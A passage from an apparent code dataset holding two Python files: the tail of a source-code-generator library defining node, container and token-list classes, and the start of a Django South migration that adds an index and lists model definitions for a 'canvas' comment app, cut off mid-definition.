self.side_comment = side_comment\n\n        # We don\'t use try: ... except: to avoid catching exceptions\n        # occurring inside the adopt_node call\n        if parent is not None:\n            if hasattr(parent, \'adopt_node\'):\n                parent.adopt_node(self)\n            else:\n                raise NotImplementedError(""The given parent does not support child adoption"")\n\n\n    def freestanding_str(self, idt=None):\n        """"""See :class:`NodeABC` for the role of this function.\n\n        This implementation just calls *inline_str* and prepends a new line and indentation string.\n        """"""\n        idt = Indentation.ensure_idt(idt)\n        snippet = self.inline_str(idt)\n        # Do not output anything if the string is empty\n        if snippet:\n            return \'\\n\'+str(idt)+snippet\n        else:\n            return \'\'\n\n    def __str__(self, idt=None):\n        """"""This implementation tries to print the node by probing the object for some methods:\n\n        1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node\n        2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node\n        3. *freestanding_str()*: see :class:`NodeABC`\n        """"""\n        # We don\'t use try: ... except: to avoid catching exceptions\n        # occurring inside the freestanding_str call\n\n        # Try to display a declaration\n        if hasattr(self, \'decl\'):\n            self_decl = self.decl()\n            if isinstance(self_decl, NodeABC):\n                return self_decl.freestanding_str(idt)\n        # Or a definition\n        elif hasattr(self, \'defi\'):\n            self_defi = self.defi()\n            if isinstance(self_defi, NodeABC):\n                return self_defi.freestanding_str(idt)\n\n        else:\n            return self.freestanding_str(idt)\n\n    def adopt_node(self, child):\n        self.append(child)\n\n\nclass DelegatedAttribute:\n    """"""This class is a descriptor that allows an object to use the value of an attribute of another instance\n    as its own.\n\n    For example, the comment attribute of the parent node of a :class:`NodeViewBase` instance is used as the comment\n    attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the\n    :class:`NodeViewBase` instance. 
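A minimal sketch (hypothetical classes, for illustration only):\n\n    >>> class Child:\n    ...     comment = DelegatedAttribute(\'comment\', \'parent\')\n    ...     def __init__(self, parent):\n    ...         self.parent = parent\n\n    Reading *comment* on a *Child* falls back to its parent\'s *comment* until the\n    attribute is explicitly assigned on the child.\n    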
When that attribute is set, it uses its own object instead of referring to the parent\'s\n    one.\n    """"""\n    def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):\n        """"""\n        :param attr_name: the name of the attribute to manage.\n        :param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also\n            holding an *attr_name* attribute.\n        :param descriptor: a descriptor class, in case the attribute should be managed through a descriptor.\n            This allows basic descriptor chaining.\n        :param default_value_list: a list of default values that do not trigger the switch to the local attribute.\n            For example, if a class sets a *comment* attribute to None by default, the attribute\n            lookup should still be made in the other instance. That way, it allows some placeholder\n            value to be set, without altering the intended behavior.\n        """"""\n        self.attr_name = attr_name\n        self.delegated_to_attr_name = delegated_to_attr_name\n        self.descriptor = descriptor\n        self.default_value_list = default_value_list\n\n    def __get__(self, instance, owner):\n        if instance is not None:\n            # If the attribute has been set on the instance, just get it\n            if instance.__dict__.get(\'__\'+self.attr_name+\'_is_set\', False):\n                if self.descriptor is not None:\n                    return self.descriptor.__get__(instance, owner)\n                else:\n                    return instance.__dict__[self.attr_name]\n\n            # Else it means that the attribute has not been set,\n            # so we delegate to the parent\n            else:\n                parent = getattr(instance, self.delegated_to_attr_name)\n                return getattr(parent, self.attr_name)\n\n        # If the descriptor is called as a class attribute, it\n        # just returns itself, to allow the world to see that it\n        # is a descriptor\n        else:\n            return self\n\n    def __set__(self, instance, value):\n        if self.descriptor is not None:\n            self.descriptor.__set__(instance, value)\n        else:\n            instance.__dict__[self.attr_name] = value\n\n        # If the value is one of the default_value_list, do not consider that the attribute was\n        # set. 
This allows some code in base classes to set the attribute to None\n        # by default, and still fall back to the parent\'s attribute in that case\n        if value not in self.default_value_list:\n            instance.__dict__[\'__\'+self.attr_name+\'_is_set\'] = True\n\n\nclass NodeViewBase(NodeBase):\n    """"""This is the base class of nodes that are views of another node.\n\n    For example, a variable declaration is a view of the variable, as it only displays\n    information already contained in the variable object.\n    View nodes should store the reference of their parent in a *parent* attribute.\n    """"""\n    def __init__(self, parent, *args, **kwargs):\n        self.parent = parent\n        super().__init__(*args, **kwargs)\n\n    def __eq__(self, other):\n        """"""Implementation of the equality test between two views:\n        it tests to see if they have the same parent and if the two views\n        are of the exact same type.\n        """"""\n        return type(self) is type(other) and self.parent is other.parent\n\n\n\nclass PhantomNode(NodeBase):\n    """"""This class is a node that will be printed as an empty string.\n\n    This is intended to be used as a placeholder when a :class:`NodeABC` instance is required.\n    """"""\n    # PhantomNode must not call Node.__init__ because it causes infinite\n    # recursion when built from Node.__init__\n    def __init__(self, *args, **kwargs):\n        self.parent = self\n        self.comment = self\n        self.side_comment = self\n\n    def inline_str(self, idt=None):\n        return \'\'\n\n    freestanding_str = inline_str\n\n# Instance used everywhere, instead of creating billions of identical PhantomNode instances\nPHANTOM_NODE = PhantomNode()\n\n\nclass NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):\n    """"""This is the base class of all the nodes that contain a list of other nodes.\n\n    It implements all the logic for operator overloading, and for printing the nodes that it takes care of.\n    It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves\n    like a list. The only exception is when given to :func:`listify`: it remains a single object, because\n    it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later,\n    and the result should be taken into account by the consumer that used :func:`listify` on it. If that were not\n    the case, the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` was called.\n\n    The other important aspect of this class is that it can guarantee the type of the contained nodes, even when\n    overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments.\n    """"""\n\n    default_node_classinfo = (NodeABC,)\n\n    def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):\n        """"""\n        :param node_list: the list of nodes that the container contains\n        :param node_classinfo: a tuple of classes used to check the nodes that enter the container.\n            If a node is not an instance of one of the *node_classinfo* classes, it is\n            passed to *node_factory*. All of the classes in *node_classinfo* must be\n            subclasses of :class:`NodeABC`.\n        :param node_factory: a factory used when an object which is not an instance of one of the classes of\n            *node_classinfo* tries to enter the container. 
The return value of this factory\n is then allowed inside.\n """"""\n node_classinfo_tuple = tuple(listify(node_classinfo))\n for classinfo in node_classinfo_tuple:\n if not issubclass(classinfo, NodeABC):\n raise ValueError(\'node_classinfo must be a subclass of NodeABC\')\n\n node_list = listify(node_list)\n\n if node_classinfo is None:\n self.node_classinfo = self.default_node_classinfo\n else:\n self.node_classinfo = node_classinfo_tuple\n\n if node_factory is None:\n # If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo\n # which is only composed of NodeABC, and therefore cannot be used as a factory\n if node_classinfo is None:\n raise ValueError(\n \'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo\'\n )\n\n # The first element in the tuple is taken as the factory\n node_factory = self.node_classinfo[0]\n\n # A wrapper to make sure that the output of the node_factory is\n # indeed a NodeABC\n def make_node_factory_wrapper(factory):\n def wrapper(node):\n result = factory(node)\n if not isinstance(result, NodeABC):\n raise ValueError(""The node factory did not give a NodeABC"")\n else:\n return result\n return wrapper\n\n self.node_factory = make_node_factory_wrapper(node_factory)\n\n self.node_list = [\n item if isinstance(item, self.node_classinfo) else self.node_factory(item)\n for item in node_list\n ]\n super().__init__(*args, **kwargs)\n\n def inline_str(self, idt=None):\n """"""Print all the contained nodes using their *freestanding_str* method,\n because a container is a freestanding context.\n It also strips the blank lines at the beginning.\n """"""\n snippet = """"\n for node in self.node_list:\n if hasattr(node, \'comment\'):\n snippet += node.comment.freestanding_str(idt)\n snippet += node.freestanding_str(idt)\n\n return strip_starting_blank_lines(snippet)\n\n def freestanding_str(self, idt=None):\n """"""Calls super().freestanding_str, and strip the blank lines\n at the beginning.\n """"""\n snippet = super().freestanding_str(idt)\n return strip_starting_blank_lines(snippet)\n\n def __copy__(self):\n cls = type(self)\n new_obj = cls.__new__(cls)\n new_obj.__dict__.update(self.__dict__)\n new_obj.node_list = copy.copy(self.node_list)\n new_obj.node_classinfo = copy.copy(self.node_classinfo)\n new_obj.node_factory = copy.copy(self.node_factory)\n return new_obj\n\n def clear(self):\n # We preserve the object\'s itself, we do not build a new one\n self[:] = []\n\n def insert(self, index, value):\n elem_list = listify(value)\n for i, elem in enumerate(elem_list):\n if not isinstance(elem, self.node_classinfo):\n elem = self.node_factory(elem)\n self.node_list.insert(index+i, elem)\n\n\n def index(self, *args, **kwargs):\n return self.node_list.index(*args, **kwargs)\n\n def count(self, *args, **kwargs):\n return self.node_list.count(*args, **kwargs)\n\n def pop(self, *args, **kwargs):\n return self.node_list.pop(*args, **kwargs)\n\n def reverse(self):\n self.node_list.reverse()\n\n def remove(self, *args, **kwargs):\n self.node_list.remove(*args, **kwargs)\n\n @abc.abstractmethod\n def __add__(self, other):\n return type(self)((self, other))\n\n @abc.abstractmethod\n def __radd__(self, other):\n return type(self)((other, self))\n\n def __iadd__(self, other):\n other_list = listify(other)\n typed_other_list = [\n item if isinstance(item, self.node_classinfo) else self.node_factory(item)\n for item in other_list\n ]\n self.node_list.extend(typed_other_list)\n return self\n\n def 
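iter_flat(self):\n        """"""Hypothetical convenience helper (an illustrative sketch, not part of the\n        original API): yield the inline string of every contained node, which can be\n        handy when debugging a container\'s content.\n        """"""\n        for node in self.node_list:\n            yield node.inline_str()\n\n    def 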
append(self, other):\n        self.__iadd__(other)\n\n    def extend(self, other_list):\n        other_list = listify(other_list)\n        for other in other_list:\n            self.append(other)\n\n    def __mul__(self, other):\n        if isinstance(other, numbers.Integral):\n            self_copy = copy.copy(self)\n            self_copy.node_list = self.node_list * other\n            return self_copy\n        else:\n            return NotImplemented\n\n    def __rmul__(self, other):\n        return self.__mul__(other)\n\n    def __imul__(self, other):\n        if isinstance(other, numbers.Integral):\n            self.node_list *= other\n            return self\n        else:\n            return NotImplemented\n\n    def __contains__(self, item):\n        return item in self.node_list\n\n    def __reversed__(self):\n        return reversed(self.node_list)\n\n    def __getitem__(self, key):\n        return self.node_list[key]\n\n    def __setitem__(self, key, value):\n        if not isinstance(value, self.node_classinfo):\n            value = self.node_factory(value)\n\n        self.node_list[key] = value\n\n    def __delitem__(self, key):\n        del self.node_list[key]\n\n    def __len__(self):\n        return len(self.node_list)\n\n    def __iter__(self):\n        return iter(self.node_list)\n\n\nclass TokenListABC(NodeBase, NonIterable, collections.MutableSequence):\n    """"""This class is an abstract base class for all classes that are token lists.\n\n    A token list is an object that holds a sequence of tokens, which get concatenated when printed.\n    The tokens are turned into strings only when the token list is printed, which is why it is\n    the lazy building block of source code constructs like expressions and many others.\n\n    When printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`,\n    or the builtin :func:`str` otherwise.\n    """"""\n    pass\n\nclass DelegatedTokenListBase(TokenListABC):\n    """"""This is the base class for token list classes that forward the calls to the :class:`TokenListABC` API\n    to an attribute.\n\n    This class implements stubs to allow transparent object composition.\n    """"""\n    @property\n    def tokenlist_attr(self):\n        """"""This property gives the attribute holding the real token list.""""""\n        attr = getattr(self, self.tokenlist_attr_name)\n        if not isinstance(attr, TokenListABC):\n            raise AttributeError(\'The attribute \'+self.tokenlist_attr_name+\' is not a TokenListABC\')\n        else:\n            return attr\n\n    @tokenlist_attr.setter\n    def tokenlist_attr(self, value):\n        return setattr(self, self.tokenlist_attr_name, value)\n\n    def __init__(self, tokenlist_attr_name, *args, **kwargs):\n        """"""\n        :param tokenlist_attr_name: the name of the attribute holding the real token list\n        """"""\n        self.tokenlist_attr_name = tokenlist_attr_name\n        super().__init__(*args, **kwargs)\n\n    def inline_str(self, idt=None):\n        return self.tokenlist_attr.inline_str(idt)\n\n    def freestanding_str(self, idt=None):\n        return self.tokenlist_attr.freestanding_str(idt)\n\n    def index(self, *args, **kwargs):\n        return self.tokenlist_attr.index(*args, **kwargs)\n\n    def insert(self, *args, **kwargs):\n        return self.tokenlist_attr.insert(*args, **kwargs)\n\n    def count(self, *args, **kwargs):\n        return self.tokenlist_attr.count(*args, **kwargs)\n\n    def pop(self, *args, **kwargs):\n        return self.tokenlist_attr.pop(*args, **kwargs)\n\n    def reverse(self):\n        self.tokenlist_attr.reverse()\n\n    def remove(self, *args, **kwargs):\n        self.tokenlist_attr.remove(*args, **kwargs)\n\n    def __add__(self, other):\n        self_copy = copy.copy(self)\n        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)\n        return self_copy\n\n    def 
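raw_tokens(self):\n        """"""Hypothetical convenience accessor (an illustrative sketch, not part of the\n        original API): return a plain list copy of the delegated tokens, mirroring\n        ``list(self)`` but making the delegation explicit.\n        """"""\n        return list(self.tokenlist_attr)\n\n    def 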
__radd__(self, other):\n        self_copy = copy.copy(self)\n        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)\n        return self_copy\n\n    def append(self, other):\n        self.tokenlist_attr.append(other)\n\n    def __iadd__(self, *args, **kwargs):\n        self.tokenlist_attr.__iadd__(*args, **kwargs)\n        return self\n\n    def extend(self, other_list):\n        self.tokenlist_attr.extend(other_list)\n\n    def __mul__(self, other):\n        self_copy = copy.copy(self)\n        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)\n        return self_copy\n\n    def __rmul__(self, *args, **kwargs):\n        self_copy = copy.copy(self)\n        self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)\n        return self_copy\n\n    def __imul__(self, other):\n        self.tokenlist_attr.__imul__(other)\n        return self\n\n    def __contains__(self, *args, **kwargs):\n        return self.tokenlist_attr.__contains__(*args, **kwargs)\n\n    def __iter__(self):\n        return self.tokenlist_attr.__iter__()\n\n    def __reversed__(self):\n        return self.tokenlist_attr.__reversed__()\n\n    def __getitem__(self, key):\n        return self.tokenlist_attr.__getitem__(key)\n\n    def __setitem__(self, key, value):\n        self.tokenlist_attr.__setitem__(key, value)\n\n    def __delitem__(self, key):\n        self.tokenlist_attr.__delitem__(key)\n\n    def __len__(self):\n        return self.tokenlist_attr.__len__()\n\n\nclass TokenListBase(TokenListABC):\n    """"""This base class implements the :class:`TokenListABC` API with all of the operator overloading logic.\n    """"""\n    def __init__(self, token_list=None, *args, **kwargs):\n        """"""\n        :param token_list: the list of tokens to store inside the token list\n        """"""\n        self._token_list = listify(token_list)\n        super().__init__(*args, **kwargs)\n\n    def inline_str(self, idt=None):\n        """"""Print the tokens of the token list and concatenate all the resulting strings.\n\n        If the token is a :class:`NodeABC`, its *inline_str* method is used.\n        Otherwise, the :func:`str` builtin is called on the token.\n        """"""\n        string = \'\'\n        for token in self._token_list:\n            if token is self:\n                # Special handling of self: allows to print itself using\n                # a different method to avoid infinite recursion and to provide\n                # a means for subclasses to implement self printing without creating a\n                # ""self-printer"" class dedicated to printing themselves\n                string += self.self_inline_str(idt)\n            elif isinstance(token, NodeABC):\n                string += token.inline_str(idt)\n            else:\n                string += str(token)\n\n        return string\n\n    def index(self, *args, **kwargs):\n        return self._token_list.index(*args, **kwargs)\n\n    def insert(self, *args, **kwargs):\n        return self._token_list.insert(*args, **kwargs)\n\n    def count(self, *args, **kwargs):\n        return self._token_list.count(*args, **kwargs)\n\n    def pop(self, *args, **kwargs):\n        return self._token_list.pop(*args, **kwargs)\n\n    def reverse(self):\n        self._token_list.reverse()\n\n    def remove(self, *args, **kwargs):\n        self._token_list.remove(*args, **kwargs)\n\n    def __add__(self, other):\n        if isinstance(other, TokenListABC):\n            other_list = list(other)\n            self_copy = copy.copy(self)\n            self_copy._token_list = self._token_list+other_list\n            return self_copy\n        # The result of the addition with a NodeContainer is a NodeContainer\n        elif isinstance(other, NodeContainerBase):\n            return other.__radd__(self)\n        else:\n            other_list = listify(other)\n            self_copy = copy.copy(self)\n            self_copy._token_list = self._token_list+other_list\n            return self_copy\n\n    def __radd__(self, other):\n        other_list = 
listify(other)\n self_copy = copy.copy(self)\n self_copy._token_list = other_list+self._token_list\n return self_copy\n\n def append(self, other):\n if isinstance(other, TokenListABC):\n other_list = tuple(other)\n else:\n other_list = listify(other)\n\n self._token_list.extend(other_list)\n return self\n\n def __iadd__(self, *args, **kwargs):\n self.append(*args, **kwargs)\n return self\n\n def extend(self, other_list):\n other_list = listify(other_list)\n for other in other_list:\n self.append(other)\n\n def __mul__(self, other):\n if isinstance(other, numbers.Integral):\n self_copy = copy.copy(self)\n self_copy._token_list = self._token_list * other\n return self_copy\n else:\n return NotImplemented\n\n def __rmul__(self, *args, **kwargs):\n return self.__mul__(*args, **kwargs)\n\n def __imul__(self, other):\n if isinstance(other, numbers.Integral):\n self._token_list *= other\n return self\n else:\n return NotImplemented\n\n def __contains__(self, *args, **kwargs):\n return self._token_list.__contains__(*args, **kwargs)\n\n def __iter__(self):\n return iter(self._token_list)\n\n def __reversed__(self):\n return reversed(self._token_list)\n\n def __getitem__(self, key):\n return self._token_list[key]\n\n def __setitem__(self, key, value):\n self._token_list[key] = value\n\n def __delitem__(self, key):\n del self._token_list[key]\n\n def __len__(self):\n return len(self._token_list)\n\n\nclass _IndentedTokenListBase:\n """"""This class is the base class that implements a token list which indents its content when printed.""""""\n def inline_str(self, idt=None):\n idt = Indentation.ensure_idt(idt)\n\n snippet = super().inline_str(idt)\n indented_new_line = ""\\n""+str(idt)\n snippet = snippet.replace(""\\n"", indented_new_line)\n return snippet\n\nclass IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):\n """"""This class is a base class for token lists that indent their content when printed.""""""\n pass\n\nclass IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):\n """"""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`.""""""\n pass\n\nclass BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):\n """"""This base class allows the instances to record the backtrace of the Python code that\n created them.\n\n This allows one to add comments in generated source code showing which file and line of the Python\n script was responsible for creating it. 
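With the default \'{filename}:{lineno}({function})\' frame format used below, a\n    recorded frame renders like ``my_generator.py:42(make_header)`` (file and\n    function names here are made up for illustration).\n    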
This is a facility when debugging the source code generator,\n and can avoid headache when ones want to track down which line of Python generated which line of\n generated source code.\n As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example.\n """"""\n __frame_format_string = \'{filename}:{lineno}({function})\'\n __frame_joiner = \', \'\n\n def __init__(self, level=0, *args, **kwargs):\n stack = inspect.stack()\n self.stack_frame_list = [\n frame[1:] for frame in stack\n if os.path.dirname(frame[1]) != os.path.dirname(__file__)\n ]\n\n super().__init__(self, *args, **kwargs)\n\n @abc.abstractmethod\n def freestanding_str(self, idt=None):\n #Construct a comment by giving itself as a token and use its freestanding_str method\n pass\n\n def self_inline_str(self, idt=None):\n return self.__frame_joiner.join(\n self.__frame_format_string.format(\n filename = os.path.relpath(frame[0]),\n lineno = frame[1],\n function = frame[2],\n line_content = frame[3][frame[4]] if frame[3] is not None else \'\'\n ) for frame in self.stack_frame_list\n )\n', '# -*- coding: utf-8 -*-\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n db.execute(""create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);"")\n\n def backwards(self, orm):\n raise RuntimeError(""Cannot reverse this migration."") \n\n models = {\n \'auth.group\': {\n \'Meta\': {\'object_name\': \'Group\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'80\'}),\n \'permissions\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'to\': ""orm[\'auth.Permission\']"", \'symmetrical\': \'False\', \'blank\': \'True\'})\n },\n \'auth.permission\': {\n \'Meta\': {\'ordering\': ""(\'content_type__app_label\', \'content_type__model\', \'codename\')"", \'unique_together\': ""((\'content_type\', \'codename\'),)"", \'object_name\': \'Permission\'},\n \'codename\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'}),\n \'content_type\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'contenttypes.ContentType\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'50\'})\n },\n \'auth.user\': {\n \'Meta\': {\'object_name\': \'User\'},\n \'date_joined\': (\'django.db.models.fields.DateTimeField\', [], {\'default\': \'datetime.datetime.now\'}),\n \'email\': (\'django.db.models.fields.EmailField\', [], {\'max_length\': \'254\', \'blank\': \'True\'}),\n \'first_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'30\', \'blank\': \'True\'}),\n \'groups\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'to\': ""orm[\'auth.Group\']"", \'symmetrical\': \'False\', \'blank\': \'True\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'is_active\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'True\'}),\n \'is_staff\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'is_superuser\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'last_login\': (\'django.db.models.fields.DateTimeField\', [], 
{\'default\': \'datetime.datetime.now\'}),\n \'last_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'30\', \'blank\': \'True\'}),\n \'password\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'128\'}),\n \'user_permissions\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'to\': ""orm[\'auth.Permission\']"", \'symmetrical\': \'False\', \'blank\': \'True\'}),\n \'username\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'30\'})\n },\n \'canvas.apiapp\': {\n \'Meta\': {\'object_name\': \'APIApp\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'255\'})\n },\n \'canvas.apiauthtoken\': {\n \'Meta\': {\'unique_together\': ""((\'user\', \'app\'),)"", \'object_name\': \'APIAuthToken\'},\n \'app\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.APIApp\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'token\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'40\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.bestof\': {\n \'Meta\': {\'object_name\': \'BestOf\'},\n \'category\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'best_of\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'canvas.Category\']""}),\n \'chosen_by\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""}),\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'best_of\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {})\n },\n \'canvas.category\': {\n \'Meta\': {\'object_name\': \'Category\'},\n \'description\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'140\'}),\n \'founded\': (\'django.db.models.fields.FloatField\', [], {\'default\': \'1298956320\'}),\n \'founder\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'founded_groups\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'moderators\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'related_name\': ""\'moderated_categories\'"", \'symmetrical\': \'False\', \'to\': ""orm[\'auth.User\']""}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'20\'}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'})\n },\n \'canvas.comment\': {\n \'Meta\': {\'object_name\': \'Comment\'},\n \'anonymous\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'author\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'comments\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'category\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'comments\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'canvas.Category\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], 
{\'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'default\': ""\'127.0.0.1\'"", \'max_length\': \'15\'}),\n \'judged\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'ot_hidden\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'parent_comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'replies\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'canvas.Comment\']""}),\n \'parent_content\': (\'django.db.models.fields.related.ForeignKey\', [], {\'blank\': \'True\', \'related_name\': ""\'comments\'"", \'null\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'posted_on_quest_of_the_day\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'replied_comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'to\': ""orm[\'canvas.Comment\']"", \'null\': \'True\', \'blank\': \'True\'}),\n \'reply_content\': (\'django.db.models.fields.related.ForeignKey\', [], {\'blank\': \'True\', \'related_name\': ""\'used_in_comments\'"", \'null\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'reply_text\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'2000\', \'blank\': \'True\'}),\n \'score\': (\'django.db.models.fields.FloatField\', [], {\'default\': \'0\', \'db_index\': \'True\'}),\n \'skip_moderation\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'star_count\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\', \'blank\': \'True\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'}),\n \'title\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'140\', \'blank\': \'True\'}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'})\n },\n \'canvas.commentflag\': {\n \'Meta\': {\'object_name\': \'CommentFlag\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'flags\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'max_length\': \'15\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'type_id\': (\'django.db.models.fields.IntegerField\', [], {}),\n \'undone\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\', \'db_index\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'flags\'"", \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.commentmoderationlog\': {\n \'Meta\': {\'object_name\': \'CommentModerationLog\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'moderator\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']"", \'null\': \'True\'}),\n \'note\': (\'django.db.models.fields.TextField\', [], {}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'moderated_comments_log\'"", \'to\': ""orm[\'auth.User\']""}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {})\n },\n \'canvas.commentpin\': {\n \'Meta\': {\'object_name\': \'CommentPin\'},\n \'auto\': 
(\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.commentsticker\': {\n \'Meta\': {\'object_name\': \'CommentSticker\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'stickers\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'epic_message\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'140\', \'blank\': \'True\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'max_length\': \'15\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'type_id\': (\'django.db.models.fields.IntegerField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'to\': ""orm[\'auth.User\']"", \'null\': \'True\', \'blank\': \'True\'})\n },\n \'canvas.commentstickerlog\': {\n \'Meta\': {\'object_name\': \'CommentStickerLog\'},\n \'comment\': 